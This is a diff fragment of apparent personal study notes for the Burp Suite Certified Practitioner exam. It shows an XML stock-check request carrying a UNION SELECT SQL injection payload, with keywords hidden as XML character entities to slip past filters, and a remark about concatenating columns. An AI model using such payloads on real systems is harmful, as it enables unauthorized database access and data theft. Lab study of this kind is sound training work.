madslaz/Burp-Suite-Certified-Practitioner/SQL-Injection.md

 ```
 <?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>8 &#x55;NION &#x53;ELECT &#42; &#x46;ROM users.tables&#x2D;&#x2D; </productId><storeId>2</storeId></stockCheck>
 ```
-  - Changed it to UNION SELECT null - we see that it only likes to return one column at a time, so we have to concatenate:
+  - Changed it to UNION SELECT null - we see that it only likes to return one column at a time, so we have to concatenate.
+Both inputs were impacted here:

 ![image](https://github.com/madslaz/Burp-Suite-Certified-Practitioner/assets/52518274/57c4ece1-7ea1-45e4-9866-3cd178865088)
 ![image](https://github.com/madslaz/Burp-Suite-Certified-Practitioner/assets/52518274/9fa260e3-3ce6-47d4-bfbc-27d316a4bcdc)